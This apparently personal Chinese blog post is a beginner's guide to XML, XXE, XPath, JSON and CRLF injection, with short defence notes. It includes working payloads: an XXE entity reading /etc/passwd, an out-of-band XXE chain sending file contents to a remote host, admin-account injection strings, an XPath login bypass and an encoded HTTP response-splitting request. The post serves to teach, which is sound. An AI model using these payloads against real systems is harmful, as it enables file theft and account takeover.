零、前言
最近做專心web安全有一段時間了,但是目測后面的活會有些復雜,涉及到更多的中間件、底層安全、漏洞研究與安全建設等越來越復雜的東東,所以在這里想寫一個系列關於web安全基礎以及一些討巧的payload技巧以便於備忘。不是大神、博客內容非常基礎,如果真的有人看而且是大牛們,請不要噴我,歡迎指正我的錯誤(水平有限)。
一、XML注入:
1、本質:
XML是一種數據組織存儲的數據結構方式,安全的XML在用戶輸入生成新的數據時候應該只能允許用戶接受的數據,需要過濾掉一些可以改變XML標簽也就是說改變XML結構插入新功能(例如新的賬戶信息,等於添加了賬戶)的特殊輸入,如果沒有過濾,則可以導致XML注入攻擊。
2、舉例說明:
1 """ 2 原始組織數據如下: 3 <USER role="guest"> 4 <name>user1</name> 5 <password>uesr1</password> 6 <email>user1@test.com</email> 7 </USER> 8 用戶本應提交的數據是user1 , user1 ,user1@test.com 9 如果用戶提交的數據是 10 POST下 11 name = user1&passwd=user1&email=user1@test.com</email></USER><USER role="admin"><name>attack</name><password>attack</password><email>attack@test.com 12 就會導致生成一個新的管理員賬戶attack 13 """
1 /* 2 (1)有回顯,直接讀取文件 3 */ 4 <?php 5 $xml=$GET['XML']; 6 $data = simplexml_load_string($xml); 7 print_r($data); 8 > 9 /* 10 攻擊請求get a.b.c.d?xml=<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root><name>&xxe;</name></root> 11 */ 12 /* 13 (2)引用遠程server上的XML文件 讀取文件 14 */ 15 /*#1.xml: 16 <!ENTITY % a SYSTEM "file:///etc/passwd"> 17 <!ENTITY % b "<!ENTITY % c SYSTEM 'gopher://xxe.com%a;'>"> %b;%c 18 #payload 19 <?xml version="1.0" encoding="utf-8"> 20 <!DOCTYPE root [ 21 <!ENTITY % remote SYSTEM "http://192.168.106.208/1.xml"> 22 %remote;]> 23 */
1 <!--原始XML為:--> 2 <?xml version="1.0" encoding="UTF-8"?> 3 <adminuser> 4 <admin id="1"> 5 <name>admin</name> 6 <password>admin</passsword> 7 </admin> 8 </adminuser> 9 <!-- 10 例如攻擊者可以修改password部分,則可以如下構造: 11 輸入: 12 <admin></password></admin><admin id=2><name>test</name><password>test</password></admin> 13 那么XML文件則會變成: 14 --> 15 <?xml version="1.0" encoding="UTF-8"?> 16 <adminuser> 17 <admin id="1"> 18 <name>admin</name> 19 <password>admin</passsword> 20 </admin> 21 <admin id="2"> 22 <name>test</name> 23 <password>test</passsword> 24 </admin> 25 </adminuser> 26 <!-- 27 增加了一個管理員權限賬號。 28 -->
3、危害:
#常見攻擊手段包括:
#讀取本地文件(可能包含敏感信息 /etc/shadow)
#內存侵犯
#任意代碼執行
#拒絕服務
4、防御:
#對有改變XML結構的特殊輸入進行過濾或者編碼
#filter list = ["&","<",">","'".'"',"/"]
#在XML保存和展示之前都需要
二、Xpath注入:
1、本質:
#Xpath是類似SQL的一種從XML結構中搜索節點數據的語言(DSL),其注入放手就是構造完整可執行的DSL,本質與SQL注入一樣。
2、舉例:
一般結構//nodename[ colunmname/colunmtype()="xxxxxx" and .......]
例如:
//USER [username/text()="admin" and password/text()="123456"]
注入就是在引號內內容着手構造:
例如password=> 111" or "2"="2
3、防御:
防御很簡單,過濾特殊輸入字符即可。
三、Json注入:
1、本質:
@json也是傳輸數據的一種格式,增加一個用戶的json結構如下:
{"adduser":[{"username":"admin1","password":"123456"}]},可以注入多增加一個 password=>123456"},{"username":"admin2","password":"123456
2、防御:
過濾關鍵字即可。
四、CRLF注入也叫HTTP響應截斷:
1、本質:
也叫CRLF注入攻擊。CR、LF分別對應回車(%0d)、換行(%0a)字符。HTTP頭由很多被CRLF組合分離的行構成,每行的結構都是“鍵:值”。如果用戶輸入的值部分注入了CRLF字符,它就有可能改變HTTP報頭結構。
2、舉例:假設數據部分是xss payload則會中招啊
1 """ 2 (1)REQUEST-METHOD : GET 3 URL : http://a.b.c.d/index.html?language=Chinense 4 RESPONSE : 5 HTTP/1.1 302 Moved Temporarily GMT\r\n 6 Date: ******** 7 Location:http://a.b.c.d/zhcn.html 8 Server:****** 9 ****** 10 (2)REQUEST-METHOD : GET 11 URL : http://a.b.c.d/index.html?language=Chinense%0d%0aContent- Length%3a+%0d%0a%0d%0aHTTP%2f1.1+200+OK%0d%0aContent-Type%3a%+text%2fhtml%d%0aContent-Length%3a+24%0d%0a%3chtml%3eI%e2%80%99m+hacker!%3c%2fhtml%3e 12 實際上就是: 13 Chinese 14 Content-Length:0 15 16 HTTP/1.1 200 OK 17 Content-Type:text/html 18 Content-Length:24 19 20 <html>I'm hacker!</html> 21 22 RESPONSE : 23 HTTP/1.1 302 Moved Temporarily GMT\r\n 24 Date: ******** 25 Location:http://a.b.c.d/zhcn.html 26 Content-Length:0 27 28 HTTP/1.1 200 OK 29 Content-Type:text/html 30 Content-Length:24 31 32 <html>I'm hacker!</html> 33 Server:****** 34 ****** 35 36 37 修改編碼格式,避免過濾函數過濾掉常用惡意payload符號的UTF-8,GBK,Unicode編碼. 38 等 39 40 當然可以不加新的http響應頭,直接注入\r\n(CRLF)和payload 41 42 常見的容易出問題的PHP函數 43 header() 44 setcookie() 45 session_id() 46 setrawcookie() 47 48 位置: 49 location -> 重定向到惡意地址 50 set-cookie -> 把自己數據寫入cookie 51 """
3、防御:
限制用戶輸入的CR和LF,或者對CR和LF字符正確編碼后再輸出